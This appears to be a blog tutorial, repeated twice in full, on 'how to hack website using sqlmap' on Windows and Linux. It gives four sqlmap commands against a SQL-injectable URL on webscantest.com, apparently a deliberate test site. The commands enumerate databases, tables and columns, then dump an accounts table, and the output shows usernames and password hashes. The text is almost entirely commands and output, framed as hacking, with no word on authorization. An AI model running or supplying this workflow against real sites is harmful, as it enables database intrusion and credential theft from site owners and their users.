As'Salamu Aleykum
You might have questions below
How to hack website using sqlmap in Windows and in Linux?
How to hack website using sqlmap?
How to hack website using sqlmap in kali linux?
How to hack website using sqlmap in linux?
How to hack website using sqlmap in Windows?
So, Today I will be teaching you How to hack website using Sqlmap in Windows and in Linux(Any Distro)
First of all you should have installed Python in Windows to run Sqlmap in windows
For Linux users you should also have python and Sqlmap installed(It is in-build in Kali Linux and Other Distro which is used by Security Researchers )
[Step 1. Getting Database Details]
sqlmap -u http://webscantest.com/datastore/search_get_by_id.php?id=4 --dbs (Linux)
sqlmap.py -u http://webscantest.com/datastore/search_get_by_id.php?id=4 --dbs (Windows)
Result :
Web server operating system: Linux Ubuntu
Web application technology: Apache 2.4.7, PHP 5.5.9
Back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] webscantest
[Step 2. Finding Tables in Database]
sqlmap -u http://webscantest.com/datastore/search_get_by_id.php?id=4 -D webscantest --tables (Linux)
sqlmap.py -u http://webscantest.com/datastore/search_get_by_id.php?id=4 -D webscantest --tables (Windows)
Result :
Database: webscantest
[4 tables]
+-----------+
| accounts |
| inventory |
| orders |
| products |
+-----------+
[Step 3. Getting Columns from the Desired Table]
sqlmap -u http://webscantest.com/datastore/search_get_by_id.php?id=4 -D webscantest -T accounts --columns (Linux)
sqlmap.py -u http://webscantest.com/datastore/search_get_by_id.php?id=4 -D webscantest -T accounts --columns (Windows)
Result :
Table: accounts
[5 columns]
+--------+--------------+
| Column | Type |
+--------+--------------+
| fname | varchar(50) |
| id | int(50) |
| lname | varchar(100) |
| passwd | varchar(100) |
| uname | varchar(50) |
+--------+--------------+
[Step 4. Dumping Data from columns]
sqlmap -u http://webscantest.com/datastore/search_get_by_id.php?id=4 --dump -D webscantest -T accounts (Linux)
sqlmap.py -u http://webscantest.com/datastore/search_get_by_id.php?id=4 --dump -D webscantest -T accounts (Windows)
Result
+----+-------+-------+----------+----------------------------------+
| id | fname | lname | uname | passwd |
+----+-------+-------+----------+----------------------------------+
| 1 | Admin | King | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 2 | Test | User | testuser | 179ad45c6ce2cb97cf1029e212046e81 |
+----+-------+-------+----------+----------------------------------+
You can Watch Video tutorial Below :
Please Comment below if you have any problem
You might have questions below
How to hack website using sqlmap in Windows and in Linux?
How to hack website using sqlmap?
How to hack website using sqlmap in kali linux?
How to hack website using sqlmap in linux?
How to hack website using sqlmap in Windows?
THIS TUTORIAL IS THE ANSWER OF ALL THE QUESTIONS ABOVE!
First of all you should have installed Python in Windows to run Sqlmap in windows
For Linux users you should also have python and Sqlmap installed(It is in-build in Kali Linux and Other Distro which is used by Security Researchers )
sqlmap -u http://webscantest.com/datastore/search_get_by_id.php?id=4 --dbs (Linux)
sqlmap.py -u http://webscantest.com/datastore/search_get_by_id.php?id=4 --dbs (Windows)
Result :
Web server operating system: Linux Ubuntu
Web application technology: Apache 2.4.7, PHP 5.5.9
Back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] webscantest
[Step 2. Finding Tables in Database]
sqlmap -u http://webscantest.com/datastore/search_get_by_id.php?id=4 -D webscantest --tables (Linux)
sqlmap.py -u http://webscantest.com/datastore/search_get_by_id.php?id=4 -D webscantest --tables (Windows)
Result :
Database: webscantest
[4 tables]
+-----------+
| accounts |
| inventory |
| orders |
| products |
+-----------+
[Step 3. Getting Columns from the Desired Table]
sqlmap -u http://webscantest.com/datastore/search_get_by_id.php?id=4 -D webscantest -T accounts --columns (Linux)
sqlmap.py -u http://webscantest.com/datastore/search_get_by_id.php?id=4 -D webscantest -T accounts --columns (Windows)
Result :
Table: accounts
[5 columns]
+--------+--------------+
| Column | Type |
+--------+--------------+
| fname | varchar(50) |
| id | int(50) |
| lname | varchar(100) |
| passwd | varchar(100) |
| uname | varchar(50) |
+--------+--------------+
[Step 4. Dumping Data from columns]
sqlmap -u http://webscantest.com/datastore/search_get_by_id.php?id=4 --dump -D webscantest -T accounts (Linux)
sqlmap.py -u http://webscantest.com/datastore/search_get_by_id.php?id=4 --dump -D webscantest -T accounts (Windows)
Result
+----+-------+-------+----------+----------------------------------+
| id | fname | lname | uname | passwd |
+----+-------+-------+----------+----------------------------------+
| 1 | Admin | King | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 2 | Test | User | testuser | 179ad45c6ce2cb97cf1029e212046e81 |
+----+-------+-------+----------+----------------------------------+
You can Watch Video tutorial Below :
Please Comment below if you have any problem
